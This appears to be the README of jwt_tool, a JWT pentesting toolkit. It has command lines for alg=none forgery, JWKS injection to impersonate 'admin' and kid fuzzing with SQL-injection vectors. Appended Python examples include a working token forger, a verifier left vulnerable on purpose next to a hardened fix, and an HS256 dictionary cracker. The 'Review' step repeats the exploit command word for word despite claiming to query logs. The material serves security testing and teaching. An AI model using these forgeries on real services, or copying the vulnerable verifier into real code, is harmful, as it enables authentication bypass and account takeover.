# The JSON Web Token Toolkit v2

Source: https://github.com/ticarpi/jwt_tool (owner ticarpi; Python; GPL-3.0 licence; 5,783 stars, 701 forks; repository created 2017-01-23, last pushed 2025-05-01; this README snapshot was synced 2025-05-14).

> *jwt_tool.py* is a toolkit for validating, forging, scanning and tampering with JWTs (JSON Web Tokens).

Version: v2.2.7. Python: 3.6+.

![logo](https://user-images.githubusercontent.com/19988419/100555535-18598280-3294-11eb-80ed-ca5a0c3455d6.png)

Its functionality includes:
* Checking the validity of a token
* Testing for known exploits:
  * (CVE-2015-2951) The ***alg=none*** signature-bypass vulnerability
  * (CVE-2016-10555) The ***RS/HS256*** public key mismatch vulnerability
  * (CVE-2018-0114) ***Key injection*** vulnerability
  * (CVE-2019-20933/CVE-2020-28637) ***Blank password*** vulnerability
  * (CVE-2020-28042) ***Null signature*** vulnerability
* Scanning for misconfigurations or known weaknesses
* Fuzzing claim values to provoke unexpected behaviours
* Testing the validity of a secret/key file/Public Key/JWKS key
* Identifying ***weak keys*** via a high-speed ***dictionary attack***
* Forging new token header and payload contents and creating a new signature with the **key** or via another attack method
* Timestamp tampering
* RSA and ECDSA key generation, and reconstruction (from JWKS files)
* ...and lots more!

---

## Audience
This tool is written for **pentesters** who need to check the strength of the tokens in use and their susceptibility to known attacks. A range of tampering, signing and verifying options are available to help delve deeper into the potential weaknesses present in some JWT libraries.  
It has also been successful for **CTF challengers**, as CTFs seem keen on JWTs at present.  
It may also be useful for **developers** who use JWTs in their projects and want to test for stability and for known vulnerabilities using forged tokens.

---

## Requirements
This tool is written natively in **Python 3** (version 3.6+) using the standard library; however, various cryptographic functions (and general prettiness/readability) require a few common third-party Python libraries, listed in `requirements.txt`.  
*(An older Python 2.x version of this tool is available on the legacy branch for those who need it, although it is no longer supported or updated.)*

---

## Installation

### Docker
The preferred way to run jwt_tool is the [official Dockerhub-hosted jwt_tool docker image](https://hub.docker.com/r/ticarpi/jwt_tool).  
Base command for running jwt_tool:  
`docker run -it --network "host" --rm -v "${PWD}:/tmp" -v "${HOME}/.jwt_tool:/root/.jwt_tool" ticarpi/jwt_tool`  

Any other arguments can be appended to this command as normal.  
Note that local files in your current working directory are mapped into the container's `/tmp` directory, so refer to them by that absolute path in your arguments, e.g. */tmp/localfile.txt*.  
The second volume mount keeps the container's `/root/.jwt_tool` directory (config, generated keys and logs) on the host, so it persists between runs.

### Manual Install
Installation is just a case of downloading the `jwt_tool.py` file (or `git clone` the repo) and installing the dependencies from inside the cloned directory.  
(`chmod` the file too if you want to add it to your *$PATH* and call it from anywhere.)

`$ git clone https://github.com/ticarpi/jwt_tool`  
`$ python3 -m pip install -r requirements.txt`  

On first run the tool will generate a config file, some utility files, a logfile, and a set of Public and Private keys in various formats.  

### Custom Configs
* To make best use of the scanning options it is **strongly advised** to copy the custom-generated JWKS file somewhere that can be accessed remotely via a URL. This address should then be stored in `jwtconf.ini` as the "jwkloc" value.  
* In order to capture external service interactions, such as DNS lookups and HTTP requests, put your unique address for Burp Collaborator (or an alternative such as RequestBin) into the config file as the "httplistener" value.  
***Review the other options in the config file to customise your experience.***

### Colour bug in Windows
To fix broken colours in Windows cmd/PowerShell, uncomment the two lines below in `jwt_tool.py` (remove the "# " from the beginning of each line).  
You will also need to install colorama: `python3 -m pip install colorama`
```
# import colorama
# colorama.init()
```
---

## Usage
The first argument should be the JWT itself (*unless providing this in a header or cookie value*). Providing no additional arguments will show you the decoded token values for review.  
`$ python3 jwt_tool.py <JWT>`  
or the Docker base command:  
`$ docker run -it --network "host" --rm -v "${PWD}:/tmp" -v "${HOME}/.jwt_tool:/root/.jwt_tool" ticarpi/jwt_tool <JWT>`  

The toolkit will validate the token and list the header and payload values.  

### Additional arguments
The many additional arguments take you straight to the appropriate function and return a token ready to use in your tests.  
For example, to tamper with the existing token run the following:  
`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -T`  

Many options need an additional value.  
For example, to run a particular type of exploit you choose the eXploit (-X) option and select the vulnerability (here using "a" for the *alg:none* exploit):  
`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X a`

### Extra parameters
Some options, such as verifying tokens, require additional parameters/files to be provided (here the Public Key in PEM format):  
`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -V -pk public.pem`  

### Sending tokens to a web application
All modes allow for sending the token directly to an application.  
You need to specify:  
* target URL (-t)
* a request header (-rh) or request cookies (-rc) that the application needs (***at least one must contain the token***)
* (optional) any POST data (where the request is a POST)
* (optional) any additional jwt_tool options, such as modes or tampering/injection options  
* (optional) a *canary value* (-cv): a text value you expect to see in the response when the token is accepted (e.g. "Welcome, ticarpi")  
An example request might look like this (using scanning mode for forced errors):  
`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -rh "Origin: null" -cv "Welcome" -M er` 

Various responses from the request are displayed:  
* Response code
* Response size
* Unique request tracking ID (for use with logging)
* Mode/options used

---

## Common Workflow

Here is a quick run-through of a basic assessment of a JWT implementation. If these options turn up nothing, dig deeper into the other modes and options to hunt for new vulnerabilities (or zero-days!).  

### Recon:  
Read the token value to get a feel for the claims/values expected by the application:  
`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`  

### Scanning:
Run a ***Playbook Scan*** using the provided token directly against the application to hunt for common misconfigurations:  
`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb`  

### Exploitation:
If any vulnerabilities are confirmed, change the relevant claims to try to exploit them (here using the *Inject JWKS* exploit and injecting a new username):  
`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin` 

### Fuzzing:
Dig deeper by testing for unexpected values and claims to identify unexpected app behaviours, or run attacks on programming logic or token processing (here fuzzing the `kid` header claim with a file of values):  
`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt`  

### Review:
Review any successful exploitation by querying the logs (each response carries a unique request tracking ID) to read more data about the request:  
`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`   

---

### Help
For a list of options call the usage function:  
`$ python3 jwt_tool.py -h`

**A more detailed user guide can be found on the [wiki page](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool).**

---

## JWT Attack Playbook - new wiki content!  
![playbook_logo](https://user-images.githubusercontent.com/57728093/68797806-21f25700-064d-11ea-9baa-c58fb6f75c0b.png)

Head over to the [JWT Attack Playbook](https://github.com/ticarpi/jwt_tool/wiki) for a detailed run-through of what JWTs are, what they do, and a full workflow of how to thoroughly test them for vulnerabilities, common weaknesses and unintended coding errors.

---

## Tips
**Regex for finding JWTs in Burp Search**  
*(make sure 'Case sensitive' and 'Regex' options are ticked)*  
`[= ]eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*` - url-safe JWT version  
`[= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*` - all JWT versions (higher possibility of false positives)  
Both patterns require a `=` or a space immediately before the token, so a JWT that directly follows a colon or starts a line is not matched. The second pattern also accepts the standard base64 characters `+` and `/`, which is where its extra false positives come from.

---

## Further Reading
* [JWT Attack Playbook (https://github.com/ticarpi/jwt_tool/wiki)](https://github.com/ticarpi/jwt_tool/wiki) - for a thorough JWT testing methodology

* [A great intro to JWTs - https://jwt.io/introduction/](https://jwt.io/introduction/)

* A lot of the initial inspiration for this tool comes from the vulnerabilities discovered by Tim McLean.  
[Check out his blog on JWT weaknesses here: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/)  

* A whole bunch of exercises for testing JWT vulnerabilities are provided by [Pentesterlab (https://www.pentesterlab.com)](https://www.pentesterlab.com). I'd highly recommend a PRO subscription if you are interested in Web App Pentesting.  

  *PLEASE NOTE:* This toolkit will solve most of the Pentesterlab JWT exercises in a few seconds when used correctly, however I'd **strongly** encourage you to work through these exercises yourself, working out the structure and the weaknesses. After all, it's all about learning...
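The alg=none signature bypass and the weak-key dictionary attack listed among jwt_tool's checks above are the two worth understanding before pointing the tool at a target. What follows is an added, stand-alone Python example written for this page; it is not jwt_tool's code and uses only the standard library. It contains a minimal HS256 signer, a deliberately vulnerable verifier that lets the token's own `alg` header decide whether a signature is checked, the hardened verifier beside it, and a dictionary attack that recovers the secret from a single captured token. The secret `secret123`, the mini wordlist and the `login` claims are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# Added example, not jwt_tool's code: a minimal HS256 JWT implementation used to show
# (1) why a verifier that trusts the token's own "alg" header is bypassed by alg=none, and
# (2) how a dictionary attack recovers a weak HS256 secret offline from one captured token.


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def hs256(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    signing_input = f"{encode_part(header)}.{encode_part(payload)}"
    return f"{signing_input}.{b64url(hs256(signing_input.encode(), secret))}"


def forge_alg_none(token: str, **new_claims) -> str:
    """Attacker side of the alg=none bypass (jwt_tool's -X a): rewrite the header to
    alg=none, change whatever claims we like and ship an empty signature."""
    h, p, _sig = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    header["alg"] = "none"
    payload.update(new_claims)
    return f"{encode_part(header)}.{encode_part(payload)}."


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """VULNERABLE on purpose: the token chooses the algorithm, so "none" means
    "no signature needed". Returns the claims if accepted, else None."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256" and hmac.compare_digest(
        hs256(f"{h}.{p}".encode(), secret), b64url_decode(s)
    ):
        return json.loads(b64url_decode(p))
    return None


def verify_hardened(token: str, secret: bytes, allowed: Iterable[str] = ("HS256",)) -> Optional[dict]:
    """FIXED: the verifier, not the token, decides which algorithms are acceptable,
    and every accepted algorithm requires a valid signature."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") not in allowed:
        return None
    if not hmac.compare_digest(hs256(f"{h}.{p}".encode(), secret), b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: header.payload is public, so each candidate secret is tried
    offline until the recomputed MAC equals the token's signature."""
    h, p, s = token.split(".")
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for candidate in wordlist:
        if hmac.compare_digest(hs256(signing_input, candidate.encode()), target):
            return candidate
    return None


WEAK_SECRET = b"secret123"  # constructed weak secret for the demo
WORDLIST = ["password", "changeme", "secret", "secret123", "letmein"]  # constructed mini wordlist


def demo() -> dict:
    token = sign_hs256({"typ": "JWT", "alg": "HS256"}, {"login": "ticarpi"}, WEAK_SECRET)
    forged = forge_alg_none(token, login="admin")
    return {
        "genuine_naive": verify_naive(token, WEAK_SECRET),
        "forged_naive": verify_naive(forged, WEAK_SECRET),        # accepted: the bug
        "forged_hardened": verify_hardened(forged, WEAK_SECRET),  # rejected
        "genuine_hardened": verify_hardened(token, WEAK_SECRET),
        "recovered_secret": crack_hs256(token, WORDLIST),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The hardened verifier's only real change is that the server fixes the algorithm allow-list and refuses `none` before it looks at the signature. The same rule is what defeats the RS/HS256 confusion attack: a token that claims HS256 is rejected outright by a service that only ever expects RS256, so the public key is never used as an HMAC secret. The dictionary attack needs no interaction with the target at all, which is why a long random HS256 secret, or an asymmetric algorithm, matters even when rate limiting is in place.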
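The Burp Search regexes from the Tips section can also be run over saved traffic. The following is an added Python example, not jwt_tool's code, that applies both patterns to a constructed HTTP request (the tokens are built inline, and `www.example.test` and the `X-Trace` header are made up) and decodes each hit's header so candidates can be sorted by `alg`. It also shows where the two patterns diverge on a base64 blob that merely starts with `eyJ`.

```python
import base64
import json
import re

# Added example, not jwt_tool's code: the two Burp Search regexes from the README, run
# over a constructed HTTP request to show what each catches and how to triage the hits.

URLSAFE_JWT = re.compile(r"[= ]eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*")    # url-safe alphabet only
ANY_JWT = re.compile(r"[= ]eyJ[A-Za-z0-9_/+-]*\.[A-Za-z0-9._/+-]*")    # also standard base64 chars


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


# Constructed sample: an HS256 token in a cookie, an alg=none token with an empty signature
# in an Authorization header, and a standard-alphabet base64 blob that only starts with "eyJ".
FAKE_SIG = b64url(bytes(range(32)))  # stand-in for a real MAC; only its alphabet matters here
TOKEN_HS256 = ".".join([encode_part({"typ": "JWT", "alg": "HS256"}), encode_part({"login": "ticarpi"}), FAKE_SIG])
TOKEN_NONE = ".".join([encode_part({"typ": "JWT", "alg": "none"}), encode_part({"login": "admin"}), ""])
NOT_A_JWT = "eyJub3RBSldU.c3Ry/aW5n+ZQ=="  # first segment decodes to the truncated text {"notAJWT

SAMPLE_REQUEST = (
    "GET /account HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    f"Cookie: jwt={TOKEN_HS256}; anothercookie=test\r\n"
    f"Authorization: Bearer {TOKEN_NONE}\r\n"
    f"X-Trace: id={NOT_A_JWT}\r\n\r\n"
)


def find_jwts(text: str, pattern=URLSAFE_JWT) -> list:
    """Return candidate tokens; the leading '=' or ' ' the regex anchors on is dropped."""
    return [m.group(0)[1:] for m in pattern.finditer(text)]


def triage(text: str, pattern=URLSAFE_JWT) -> list:
    """Decode each candidate's header so hits can be sorted by alg; unparseable headers
    (the false positives the README warns about) come back with alg None."""
    rows = []
    for tok in find_jwts(text, pattern):
        parts = tok.split(".")
        try:
            header = json.loads(b64url_decode(parts[0]))
            alg = header.get("alg") if isinstance(header, dict) else None
        except ValueError:  # binascii.Error and json.JSONDecodeError both subclass ValueError
            alg = None
        rows.append({"token": tok, "segments": len(parts), "alg": alg})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_REQUEST):
        print(f"alg={row['alg']!s:6} segments={row['segments']} {row['token'][:40]}...")
    print("all-versions regex, third hit:", find_jwts(SAMPLE_REQUEST, ANY_JWT)[2])
```

Sorting by `alg` is the quickest first pass: a live `alg=none` token, or a `kid`/`jku` header on a token you did not expect to carry one, is where the scanning and exploitation modes described above should go first. Candidates with a non-JSON header or fewer than three segments are the noise the README's "higher possibility of false positives" note refers to and can be dropped before testing.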